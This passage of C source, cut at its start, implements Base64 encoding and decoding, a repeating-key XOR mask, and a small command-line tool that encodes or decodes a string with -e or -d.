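        if (cap - n < ENCODERBLOCKLEN) {
            rc = -1;
            have = 0;
            break;
        }
        out[n++] = (unsigned char)(group[0] << 2 | group[1] >> 4);
        out[n++] = (unsigned char)(group[1] << 4 | group[2] >> 2);
        out[n++] = (unsigned char)(group[2] << 6 | group[3]);
        have = 0;
    }

    /* A trailing group of 2 symbols carries 1 byte, of 3 symbols 2 bytes. */
    if (have >= 2) {
        size_t tail = have - 1;

        if (cap - n < tail) {
            rc = -1;
        } else {
            out[n++] = (unsigned char)(group[0] << 2 | group[1] >> 4);
            if (tail == 2) {
                out[n++] = (unsigned char)(group[1] << 4 | group[2] >> 2);
            }
        }
    }

    *outlen = n;
    return rc;
}

/* XOR `len` bytes in place with the key, repeating the key as needed. */
static void xor_with_key(unsigned char *buf, size_t len)
{
    const char *end = memchr(key, '\0', sizeof key);
    size_t klen = end != NULL ? (size_t)(end - key) : sizeof key;

    if (klen == 0) {
        return; /* empty key: nothing to mix in, and avoids modulo by zero */
    }
    for (size_t i = 0; i < len; i++) {
        buf[i] ^= (unsigned char)key[i % klen];
    }
}

/*
 * Turn four six-bit values in `input` into three bytes and append them to
 * the C string in `output` (so a decoded zero byte ends the append).
 * Always returns 0.
 */
int decodeblock(char *input, char *output, int oplen)
{
    const unsigned char *v = (const unsigned char *)input;
    char decoded[ENCODERLEN + 1] = "";

    decoded[0] = (char)(v[0] << 2 | v[1] >> 4);
    decoded[1] = (char)(v[1] << 4 | v[2] >> 2);
    decoded[2] = (char)(v[2] << 6 | v[3]);
    strncat(output, decoded, room_left(output, oplen));
    return 0;
}

/*
 * Decode the Base64 text in `input` and append the result to the C string
 * in `output` (at most `oplen` characters). Meant for text payloads: the
 * result is NUL-terminated. Returns 0, or -1 if `output` is too small.
 */
int Base64Decode(char *input, char *output, int oplen)
{
    size_t used = strlen(output);
    size_t n = 0;
    int rc = decode_bytes(input, (unsigned char *)output + used,
                          room_left(output, oplen), &n);

    output[used + n] = '\0';
    return rc;
}

/*
 * Encode one NUL-terminated block of up to three characters and append the
 * four resulting Base64 characters to `output`. Returns 0, or -1 if they
 * do not fit.
 */
int encodeblock(char *input, char *output, int oplen)
{
    size_t n = strlen(input);

    if (n > ENCODERBLOCKLEN) {
        n = ENCODERBLOCKLEN;
    }
    return encode_bytes((const unsigned char *)input, n, output, oplen);
}

/*
 * Base64-encode the C string `input` and append the text to the C string
 * in `output` (at most `oplen` characters). Returns 0, or -1 if it does
 * not fit.
 */
int Base64Encode(char *input, char *output, int oplen)
{
    return encode_bytes((const unsigned char *)input, strlen(input),
                        output, oplen);
}

int main(int argc, char **argv)
{
    char encodedoutput[BUFFFERLEN + 1] = "";
    char decodedoutput[BUFFFERLEN + 1] = "";

    if (argc < 3) {
        fprintf(stderr, "usage: %s -e string | -d hash\n",
                argc > 0 ? argv[0] : "enc");
        return EXIT_FAILURE;
    }

    if (strcmp(argv[1], "-e") == 0) {
        if (encrypt(argv[2], encodedoutput, decodedoutput) != 0) {
            fprintf(stderr, "input too long\n");
            return EXIT_FAILURE;
        }
        printf("%s \n", encodedoutput);
    }
    if (strcmp(argv[1], "-d") == 0) {
        if (decrypt(argv[2], encodedoutput, decodedoutput) != 0) {
            fprintf(stderr, "input too long\n");
            return EXIT_FAILURE;
        }
        printf("%s \n", decodedoutput);
    }
    return 0;
}

/*
 * Encode `inputs` as Base64, XOR the result with the key, and append the
 * Base64 form of those masked bytes to `encodedoutput`. `decodedoutput`
 * is unused and kept only for the original signature. Inputs longer than
 * 72 characters do not fit the 128-character buffers. Returns 0 on
 * success, -1 if a stage overflows.
 */
int encrypt(char *inputs, char encodedoutput[BUFFFERLEN + 1],
            char decodedoutput[BUFFFERLEN + 1])
{
    char inner[BUFFFERLEN + 1] = "";
    size_t len;

    (void)decodedoutput;
    if (Base64Encode(inputs, inner, BUFFFERLEN) != 0) {
        return -1;
    }
    /* Measure before masking: masked bytes may be zero. */
    len = strlen(inner);
    xor_with_key((unsigned char *)inner, len);
    return encode_bytes((const unsigned char *)inner, len, encodedoutput,
                        BUFFFERLEN);
}

/*
 * Reverse encrypt(): Base64-decode `inputs` to raw bytes, XOR them with the
 * key, and Base64-decode the recovered text, appending it to
 * `decodedoutput`. `encodedoutput` is unused and kept only for the
 * original signature. Returns 0 on success, -1 if a stage overflows.
 */
int decrypt(char *inputs, char encodedoutput[BUFFFERLEN + 1],
            char decodedoutput[BUFFFERLEN + 1])
{
    unsigned char inner[BUFFFERLEN + 1];
    size_t len = 0;

    (void)encodedoutput;
    if (decode_bytes(inputs, inner, BUFFFERLEN, &len) != 0) {
        return -1;
    }
    xor_with_key(inner, len);
    inner[len] = '\0';
    return Base64Decode((char *)inner, decodedoutput, BUFFFERLEN);
}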
 
		 
         
                